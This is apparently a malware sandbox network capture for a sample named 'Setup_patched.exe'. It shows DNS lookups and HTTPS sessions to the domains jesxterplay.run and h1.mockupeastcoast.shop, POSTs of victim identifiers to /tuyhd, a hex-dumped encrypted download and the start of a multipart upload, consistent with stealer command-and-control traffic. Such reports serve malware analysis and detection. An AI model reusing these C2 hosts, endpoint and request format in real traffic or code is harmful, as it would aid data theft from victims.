                                                                                Apr 13, 2025 17:05:28.599724054 CEST44349699104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:28.600081921 CEST44349699104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:28.601617098 CEST49699443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:28.601907015 CEST49699443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:28.601949930 CEST44349699104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:29.335103989 CEST44349699104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:29.335215092 CEST44349699104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:29.335401058 CEST49699443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:29.335401058 CEST49699443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:29.647008896 CEST49699443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:29.647070885 CEST44349699104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:29.721862078 CEST49700443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:29.721932888 CEST44349700104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:29.722026110 CEST49700443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:29.722301960 CEST49700443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:29.722335100 CEST44349700104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:29.956358910 CEST44349700104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:29.956434965 CEST49700443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:29.958096027 CEST49700443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:29.958106041 CEST44349700104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:29.958334923 CEST44349700104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:29.959841013 CEST49700443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:29.959975004 CEST49700443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:29.959995031 CEST44349700104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:30.556421995 CEST44349700104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:30.556729078 CEST44349700104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:30.556876898 CEST49700443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:30.556878090 CEST49700443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.457693100 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.457762957 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:31.457863092 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.458384037 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.458415031 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:31.688039064 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:31.688199043 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.691874027 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.691900969 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:31.692218065 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:31.696655035 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.698241949 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.698292017 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:31.698420048 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.698486090 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:31.698625088 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.698909044 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:31.699084044 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.699120045 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:31.699326992 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.699393034 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:31.699594975 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.699641943 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.699661016 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:31.699763060 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:31.699893951 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.699966908 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.744277000 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:31.744489908 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.744573116 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.744606972 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.792311907 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:31.792582035 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.792679071 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.792721033 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.836297035 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:31.836466074 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:31.880289078 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:32.020559072 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:33.315131903 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:33.315378904 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:33.315623999 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:33.315721035 CEST49701443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:33.315762043 CEST44349701104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:33.367832899 CEST49702443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:33.367886066 CEST44349702104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:33.367974043 CEST49702443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:33.368263006 CEST49702443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:33.368277073 CEST44349702104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:33.612919092 CEST44349702104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:33.613012075 CEST49702443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:33.614336014 CEST49702443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:33.614343882 CEST44349702104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:33.615324974 CEST44349702104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:33.616411924 CEST49702443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:33.616437912 CEST49702443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:33.616580009 CEST44349702104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:34.180891991 CEST44349702104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:34.181030035 CEST44349702104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:34.181104898 CEST49702443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:34.181222916 CEST49702443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:34.181268930 CEST44349702104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:34.181298971 CEST49702443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:34.181315899 CEST44349702104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:34.339066029 CEST49703443192.168.2.589.169.54.153
                                                                                Apr 13, 2025 17:05:34.339097023 CEST4434970389.169.54.153192.168.2.5
                                                                                Apr 13, 2025 17:05:34.339193106 CEST49703443192.168.2.589.169.54.153
                                                                                Apr 13, 2025 17:05:34.339612007 CEST49703443192.168.2.589.169.54.153
                                                                                Apr 13, 2025 17:05:34.339643955 CEST4434970389.169.54.153192.168.2.5
                                                                                Apr 13, 2025 17:05:34.552793026 CEST4434970389.169.54.153192.168.2.5
                                                                                Apr 13, 2025 17:05:34.553699017 CEST49704443192.168.2.589.169.54.153
                                                                                Apr 13, 2025 17:05:34.553776026 CEST4434970489.169.54.153192.168.2.5
                                                                                Apr 13, 2025 17:05:34.553869009 CEST49704443192.168.2.589.169.54.153
                                                                                Apr 13, 2025 17:05:34.554162979 CEST49704443192.168.2.589.169.54.153
                                                                                Apr 13, 2025 17:05:34.554198980 CEST4434970489.169.54.153192.168.2.5
                                                                                Apr 13, 2025 17:05:34.770416975 CEST4434970489.169.54.153192.168.2.5
                                                                                Apr 13, 2025 17:05:34.771051884 CEST49705443192.168.2.589.169.54.153
                                                                                Apr 13, 2025 17:05:34.771090031 CEST4434970589.169.54.153192.168.2.5
                                                                                Apr 13, 2025 17:05:34.771164894 CEST49705443192.168.2.589.169.54.153
                                                                                Apr 13, 2025 17:05:34.772085905 CEST49705443192.168.2.589.169.54.153
                                                                                Apr 13, 2025 17:05:34.772151947 CEST4434970589.169.54.153192.168.2.5
                                                                                Apr 13, 2025 17:05:34.772207022 CEST49705443192.168.2.589.169.54.153
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Apr 13, 2025 17:05:16.174993992 CEST5331853192.168.2.51.1.1.1
                                                                                Apr 13, 2025 17:05:16.374119997 CEST53533181.1.1.1192.168.2.5
                                                                                Apr 13, 2025 17:05:34.184140921 CEST5444653192.168.2.51.1.1.1
                                                                                Apr 13, 2025 17:05:34.337949038 CEST53544461.1.1.1192.168.2.5
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Apr 13, 2025 17:05:16.174993992 CEST192.168.2.51.1.1.10x96baStandard query (0)jesxterplay.runA (IP address)IN (0x0001)false
                                                                                Apr 13, 2025 17:05:34.184140921 CEST192.168.2.51.1.1.10x325aStandard query (0)h1.mockupeastcoast.shopA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Apr 13, 2025 17:05:16.374119997 CEST1.1.1.1192.168.2.50x96baNo error (0)jesxterplay.run104.21.80.1A (IP address)IN (0x0001)false
                                                                                Apr 13, 2025 17:05:16.374119997 CEST1.1.1.1192.168.2.50x96baNo error (0)jesxterplay.run104.21.32.1A (IP address)IN (0x0001)false
                                                                                Apr 13, 2025 17:05:16.374119997 CEST1.1.1.1192.168.2.50x96baNo error (0)jesxterplay.run104.21.96.1A (IP address)IN (0x0001)false
                                                                                Apr 13, 2025 17:05:16.374119997 CEST1.1.1.1192.168.2.50x96baNo error (0)jesxterplay.run104.21.48.1A (IP address)IN (0x0001)false
                                                                                Apr 13, 2025 17:05:16.374119997 CEST1.1.1.1192.168.2.50x96baNo error (0)jesxterplay.run104.21.112.1A (IP address)IN (0x0001)false
                                                                                Apr 13, 2025 17:05:16.374119997 CEST1.1.1.1192.168.2.50x96baNo error (0)jesxterplay.run104.21.16.1A (IP address)IN (0x0001)false
                                                                                Apr 13, 2025 17:05:16.374119997 CEST1.1.1.1192.168.2.50x96baNo error (0)jesxterplay.run104.21.64.1A (IP address)IN (0x0001)false
                                                                                Apr 13, 2025 17:05:34.337949038 CEST1.1.1.1192.168.2.50x325aNo error (0)h1.mockupeastcoast.shop89.169.54.153A (IP address)IN (0x0001)false
                                                                                • jesxterplay.run
                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.549692104.21.80.14437836C:\Users\user\Desktop\Setup_patched.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-04-13 15:05:16 UTC265OUTPOST /tuyhd HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                Content-Length: 81
                                                                                Host: jesxterplay.run
                                                                                2025-04-13 15:05:16 UTC81OUTData Raw: 75 69 64 3d 63 35 34 33 66 64 39 66 65 30 30 32 32 66 34 39 62 65 63 37 63 33 66 61 32 63 61 38 65 63 37 37 39 33 34 64 30 33 30 36 26 63 69 64 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
                                                                                Data Ascii: uid=c543fd9fe0022f49bec7c3fa2ca8ec77934d0306&cid=637b55279021aab33278188cfa638397
                                                                                2025-04-13 15:05:17 UTC784INHTTP/1.1 200 OK
                                                                                Date: Sun, 13 Apr 2025 15:05:17 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 38593
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lV9edzqW7NWJdwaKVnq7uLa8pS5NlqDfhfDPIMO1lG7TTW42aHYfjC6X9mLUz3nGglZgw6Vi6rqMsnsyC9DplX0yUhXg%2F0AlKdfsW4neT1KG4A0MJFDJwq5g%2FoqujfpDviM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 92fbdc583bb53d59-JAX
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=112400&min_rtt=112307&rtt_var=23782&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3048&recv_bytes=982&delivery_rate=35951&cwnd=252&unsent_bytes=0&cid=4d2819f7b560b73b&ts=838&x=0"
                                                                                2025-04-13 15:05:17 UTC585INData Raw: 5f 93 31 d7 ee df cb cf 84 42 d0 9a 5d fc fa 37 dd 80 2d c1 96 83 d2 d0 40 ca 42 49 c2 46 9a 37 36 6e 98 4c e4 59 ae d7 d4 1e fd 42 96 ac 8a 8f 0b be 9a b4 0d 60 a2 2f 5a 74 a1 80 46 0e 80 40 c2 2d 9e d7 1f 96 b0 a9 21 b6 2f 4c be f4 32 69 26 6f 1d 68 48 87 2b e7 94 c9 fd 01 52 ef d4 f4 bb e3 69 d4 03 8a 33 bb 0b 1d eb 42 4f 02 f5 a9 e3 df 59 c8 e2 97 cb 99 f5 bd 52 1a bb fd 17 42 77 b9 f9 10 cb c2 87 92 3c 87 d9 a4 13 4c 29 47 95 a4 17 b6 25 f8 8f 8f ba 12 ff 66 86 03 56 ec 6c 78 14 f0 2e 8c 80 73 42 38 47 af b6 44 5b 8d 9a 96 51 c9 9a 33 3f 4f e1 3e e2 01 68 41 ec 3d 74 65 5f 41 a7 44 50 36 dc c5 ce 83 84 cd 9a 2b 74 56 01 e8 46 36 dc f6 e3 11 59 70 dc 91 cf a1 dc 7b 3c 00 9a 43 6d 96 a7 e4 d4 6b 0f 0a e9 2a 66 7f a0 d5 8e d2 96 4b 30 db 2a 3b e9 58 34
                                                                                Data Ascii: _1B]7-@BIF76nLYB`/ZtF@-!/L2i&ohH+Ri3BOYRBw<L)G%fVlx.sB8GD[Q3?O>hA=te_ADP6+tVF6Yp{<Cmk*fK0*;X4
                                                                                2025-04-13 15:05:17 UTC1369INData Raw: 4e 29 91 49 5a 0c 0d 12 f6 5a 85 33 1d 1a 84 4e 55 39 a5 07 6b 41 fc b7 da af 68 e4 c7 55 ef 09 6c 4c 45 d0 37 43 52 c7 90 db 50 c7 e5 8b a6 e5 ee 34 c6 3e 1e 09 6c 2b 1a 72 59 b0 00 08 6d 3b 21 db 39 e2 43 da 7b b0 57 82 7d f2 2c 29 79 0e cc a1 4f d9 64 fd af 34 86 a7 03 fd 3e 62 51 57 6b 18 26 14 d0 dd f7 41 e9 78 f9 da 00 6b a5 94 ad ef e8 57 6e eb f9 1c da 76 a7 07 19 cf 8e e5 9e 1f b1 1a 4e f6 dd 53 8c 88 1e b9 97 43 35 2d e4 bc 47 29 ef 05 4c 8b 46 20 33 4b 1b d3 4b a9 29 fa 9a 9d ef 13 03 fb e9 26 df a7 69 b2 9c 1d c1 9f 8f 45 90 a3 51 6c 44 14 7e 13 39 3d 0f a3 2e ac d8 af 86 83 f5 56 fa 34 b5 13 1c 08 8f 92 e7 6b 32 20 1d 5e e8 3e 20 35 f5 ac 8c 05 b2 e3 52 6f c6 c0 a7 72 79 08 5d 25 d7 51 75 c4 43 e7 27 ae ef 23 60 3c 5c 9e a9 b9 59 c7 99 4d ca
                                                                                Data Ascii: N)IZZ3NU9kAhUlLE7CRP4>l+rYm;!9C{W},)yOd4>bQWk&AxkWnvNSC5-G)LF 3KK)&iEQlD~9=.V4k2 ^> 5Rory]%QuC'#`<\YM
                                                                                2025-04-13 15:05:17 UTC1369INData Raw: 09 87 20 6d 34 28 7e f6 bb 8f 05 21 67 c3 3a 08 3c 77 cb 50 3a 0b 0e 87 5a d8 f4 64 00 c9 db 69 93 54 2c 38 78 6b fc 66 b0 b4 d9 7f 21 d9 df d9 f0 7d e3 87 0e d7 3e aa 51 c4 ff 03 a4 e2 72 e5 ac 38 a7 7b ca db c6 b3 5b 03 ee 3e 7a 7f 61 ad 3f 33 7f 00 7b 48 e5 e4 13 07 8b 6c 68 9a a0 2b 4b 41 91 72 7e 32 24 ed 10 2a f3 7a 7e 8f b1 75 1f a4 c5 77 63 82 70 21 e1 44 36 c5 80 0b 87 cb dc 73 20 6f 8d 36 1e a8 8a fd 54 cd 64 3d c3 3f 3d 44 f3 99 99 cc 05 cb 2f 02 4a e2 db e8 6d 23 7b f8 02 d4 56 56 06 4e 15 c1 1a f2 aa 7b cc 9d c8 4a d3 d8 a3 4c 7b 42 0e 6c 3f d6 f0 23 13 ef 51 86 a9 bb 5c 78 17 98 c9 d1 80 f8 2c 74 48 b3 db 4e 12 fa 12 da f7 f2 9f 60 d7 b8 f9 71 9b 43 be ab 9e 4d 0b 82 5c 82 c8 d7 5e a1 24 44 72 c7 92 9a d3 18 3f 7d a8 d6 c8 2f 13 e2 5b 96 e1
                                                                                Data Ascii: m4(~!g:<wP:ZdiT,8xkf!}>Qr8{[>za?3{Hlh+KAr~2$*z~uwcp!D6s o6Td=?=D/Jm#{VVN{JL{Bl?#Q\x,tHN`qCM\^$Dr?}/[
                                                                                2025-04-13 15:05:17 UTC1369INData Raw: 82 01 53 73 b1 2e 97 fb 3c f7 27 64 c7 34 43 87 c5 ab 70 07 cf b8 43 eb 27 2d 4e 92 01 3d 1c 2c b7 80 18 05 61 6e d4 ba 72 51 30 22 a5 b9 0f 85 c3 0d d5 39 81 dc 36 86 ee 7b 56 c5 81 3c c0 44 d4 a8 32 45 20 2e 41 e1 a2 6f 94 33 6e fe a8 d9 80 55 c5 37 46 dd 86 91 b5 9e df 4e b6 3e 2e 1f b8 3e 8c 2e 27 89 17 aa e1 f3 45 e6 75 80 f6 9c fc 64 cc 4c b9 4c fb 60 f6 f6 60 b1 62 4c af 75 c9 8e 04 08 c7 0e a0 6b 6f 11 2d 84 60 22 c1 b7 9d 0a a7 40 8d dd 89 91 a8 2e 5b 1e b3 34 e6 00 fe ec 83 dc 2e b0 37 80 68 b6 64 b5 9a b5 22 b1 ef 5e 3f 5e 45 65 de f4 d0 6f a9 e3 8b ba df c2 63 4c c7 d2 39 58 17 bd a1 bc 36 c3 dc 2b 05 3f 33 7b f4 2e 47 91 34 fc 7d 3a ff fd 7f 23 4d 76 9c 99 34 6a bb 2b 84 a6 57 d9 a4 5b 13 75 d2 56 d6 c9 4e d0 54 78 b5 41 52 70 ea a7 b2 1f a3
                                                                                Data Ascii: Ss.<'d4CpC'-N=,anrQ0"96{V<D2E .Ao3nU7FN>.>.'EudLL``bLuko-`"@.[4.7hd"^?^EeocL9X6+?3{.G4}:#Mv4j+W[uVNTxARp
                                                                                2025-04-13 15:05:17 UTC1369INData Raw: 76 9b d9 32 e4 a9 06 4c b8 66 c2 98 23 d5 cf 33 bd 5d de 63 df f9 92 4d a0 27 8c 3c a1 3f e4 93 58 12 74 2a 83 6f 69 c5 89 2a 4c bd 23 f3 7c 52 51 01 df 94 c6 84 a3 4c c2 8d 33 8c 08 d6 a0 4f ff 23 e7 fd 06 7b 44 d8 ec f9 b1 c7 68 71 fb 0e b8 f6 76 93 71 af f9 3f 48 e0 42 cf 73 ad 2a b4 cd 9f 33 71 37 a2 02 40 4a 41 d4 17 0b 69 ac 48 6f 95 58 0f 07 09 ad b9 c3 5c 70 84 ce 10 e6 7c df d5 c9 8c c8 b3 a4 15 a2 82 88 f6 51 3c 24 29 a8 31 09 79 30 f9 3d 79 4d 6a d3 7f 20 5b a3 4a 80 ce 05 92 0c 3c 5f 53 83 64 f6 2f 6f d5 be 99 f7 cc 3d 2d d2 d9 5c 35 d4 38 d3 fc 75 e7 c4 01 14 b1 8d ee 3b 40 c0 61 62 d6 03 93 53 30 ca 85 e0 6f 30 e2 dd da ad 8c 2f fa ef 71 23 a9 9a ac c5 a4 30 2a da 47 88 1b 50 4e c5 81 55 96 fb 32 10 a2 d4 8a a6 80 ee d7 ec d3 e8 9e a7 c2 22
                                                                                Data Ascii: v2Lf#3]cM'<?Xt*oi*L#|RQL3O#{Dhqvq?HBs*3q7@JAiHoX\p|Q<$)1y0=yMj [J<_Sd/o=-\58u;@abS0o0/q#0*GPNU2"
                                                                                2025-04-13 15:05:17 UTC1369INData Raw: ff db 7f cd e7 db ac ea 4f 78 4f ab 59 8b df 69 e3 86 0e bf 43 fc 26 8b 0d 53 ec 7c 27 04 97 5a 62 f6 ee b2 46 30 2c e3 00 ca 2c fb 6f ea eb a0 31 0e 73 6c 4e 79 ff 0e f2 35 90 d4 da a5 fa 76 a8 39 9b af 51 eb 3e 9d 0c a4 ee 28 a9 64 25 27 9e 3b f3 d6 50 3c a5 28 2d 82 ac ac e3 fa d9 73 e5 d1 b4 39 ff f7 25 6f 31 18 aa b0 f1 67 8a 1a de 46 75 dc c3 d0 11 d5 19 05 30 6b 9f b4 bc 40 96 1d a2 e1 7f 45 5d d3 82 52 7c 93 e7 6d a4 ff 3e cf d8 e7 af 43 36 0e 13 7d 4e 11 43 a9 18 27 1c d7 32 46 e0 87 10 97 87 15 1c bc a3 fe 78 fa d7 d7 85 38 16 77 8c c0 b0 3d 25 82 59 42 48 aa 3f 9a c5 43 6a 53 bc ea 93 2e 5f cf 29 0e 9c 67 b9 23 8f 50 16 87 20 87 9a 7c 55 09 d7 ca 41 e5 d8 96 ad b2 8c e5 38 a5 37 2c 7a 2b 5c 2d 1b 50 ad df 8a a5 b4 4b 21 45 84 a8 44 6f 55 88 60
                                                                                Data Ascii: OxOYiC&S|'ZbF0,,o1slNy5v9Q>(d%';P<(-s9%o1gFu0k@E]R|m>C6}NC'2Fx8w=%YBH?CjS._)g#P |UA87,z+\-PK!EDoU`
                                                                                2025-04-13 15:05:17 UTC1369INData Raw: b3 fc 72 66 78 a6 a4 2b d3 bc 2b 91 9d af 06 6a ce b8 bc 97 56 80 08 5a b9 34 9b 16 71 05 8c e8 57 6c d0 04 a8 de 12 f0 6e c6 6e c9 71 96 70 1f 14 d5 8d ab e7 cb 7a 69 02 33 8e a2 1d 1c 97 94 ba 20 43 17 b4 af 7d 10 9e e2 e3 72 85 4a b6 7f 01 39 ce 69 08 d1 28 de 32 f7 ce 57 b7 ed 38 69 bd e1 f4 f0 a0 38 2c 53 41 6a 99 58 c4 66 df a8 6f 3f 73 cf e8 e6 d4 13 71 b4 8b 2e 11 28 98 18 9d d6 d1 16 eb 6f 4a 9e 5c 96 73 2b 33 1e 7a f9 f4 37 76 18 17 30 45 90 26 60 cb 19 d8 8a e0 ce 38 fb 4f 86 cc c6 37 06 f8 88 3a 9a 60 ad c2 ba db 8a 01 02 58 3a c2 4a f4 b9 2f 47 fc 3b 5b e3 0c 74 76 74 aa f7 10 df ac 24 2a 95 30 b5 3b 2a 03 8f 09 d0 85 9f 4c 62 47 04 64 b6 5a 30 4e a8 eb bc 08 a3 45 d3 8b d9 bf a5 39 40 8a 4c 6a 66 65 16 50 5a 16 ba b1 1c 9e ac 4b cc 6f 0c 12
                                                                                Data Ascii: rfx++jVZ4qWlnnqpzi3 C}rJ9i(2W8i8,SAjXfo?sq.(oJ\s+3z7v0E&`8O7:`X:J/G;[tvt$*0;*LbGdZ0NE9@LjfePZKo
                                                                                2025-04-13 15:05:17 UTC1369INData Raw: a9 88 a6 85 bb 53 38 31 6a 34 78 ab e9 8f ac 8f 05 d9 9b 04 bf f1 ca d5 27 7a b7 ae 59 bb 01 ef 4f b7 f0 54 1c 67 d3 06 25 93 df c9 82 d2 7a 59 8a 36 ec 4b be ce 24 ff 90 92 13 ff 3b 89 26 fc 2c 7a 3c 30 58 92 e0 79 9b 2a b7 1b 4a 1c 49 00 c9 8c 2f 54 ab b2 4e 04 7d 2f 3f bb 05 c2 41 c7 d0 ea dc d2 cd 46 0b f6 64 a2 aa 0b e9 c2 74 87 e3 88 f0 f8 00 c1 07 7f 27 50 4b 94 cd 2c 36 72 b1 bb 3c 41 5f db 0f cb b3 8c e8 2c 04 f1 2a 7e 83 00 86 92 8d 6a 10 8e 63 ab 4c 5f 0f 9a b7 04 0f e0 34 32 69 46 90 d4 dc 43 db 18 5d fd 32 88 a1 86 9b ce 21 de 27 c5 c1 b0 ea c2 27 f8 0a d4 23 1b 76 86 0d c2 6d 2e 3c 0f b2 58 d8 69 e6 70 72 d3 ae 11 74 e3 75 1e c7 6f 3e a7 90 52 79 d7 51 61 7d bb 31 f0 6d 54 0f 91 36 d3 73 72 31 da ee 77 83 cf df b4 b3 29 12 4d f4 df 04 0b e5
                                                                                Data Ascii: S81j4x'zYOTg%zY6K$;&,z<0Xy*JI/TN}/?AFdt'PK,6r<A_,*~jcL_42iFC]2!''#vm.<Xiprtuo>RyQa}1mT6sr1w)M
                                                                                2025-04-13 15:05:17 UTC751INData Raw: a4 80 3d 7e c7 09 c6 2d 01 2c e7 a4 d1 e0 be 57 b4 bf 60 3e 2e c2 a0 5c 26 b9 1e fe 00 a0 6c 58 9c 73 3f 0e c7 d5 2b 31 c8 7d cd d3 8b ef e3 9c a4 12 ef d2 ab 72 3e d1 fb be 4d 22 66 68 36 60 2b 04 03 cd 61 d1 ef 44 1a 84 ae 50 af 6d bc 3b a2 cc dc 6c 81 1f 74 21 16 24 2b 68 a1 90 c5 6c 34 29 48 50 ee 2c df 14 22 14 ba c1 6f 19 70 21 88 9d 62 d9 15 86 6e e4 f5 59 d4 f6 7b 02 9f 05 a5 20 16 4a fa e8 e0 91 14 8a f9 52 93 7b 86 53 2c 56 74 ed 76 29 87 8b 94 53 40 0a 29 f6 23 9b 85 43 8a d7 e5 64 e7 9a 90 95 99 16 05 d3 3b b0 6d 6f 0b 2c f1 44 ba 46 42 20 37 e7 5f e6 fa 14 2f 91 30 62 a6 3e a0 8c b1 54 4f 95 29 9d 30 5f 66 3d ab dd 0f 4b 2f 69 7f 31 9d 26 52 06 cd 69 a0 63 8e 96 86 24 29 9c 3f 75 b3 41 8f f1 9c 6e db 71 68 69 c3 74 6b 72 64 fa 7a e9 e7 ba dc
                                                                                Data Ascii: =~-,W`>.\&lXs?+1}r>M"fh6`+aDPm;lt!$+hl4)HP,"op!bnY{ JR{S,Vtv)S@)#Cd;mo,DFB 7_/0b>TO)0_f=K/i1&Ric$)?uAnqhitkrdz


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.549694104.21.80.14437836C:\Users\user\Desktop\Setup_patched.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-04-13 15:05:19 UTC278OUTPOST /tuyhd HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=1j523GbbQK5Iv
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                Content-Length: 14896
                                                                                Host: jesxterplay.run
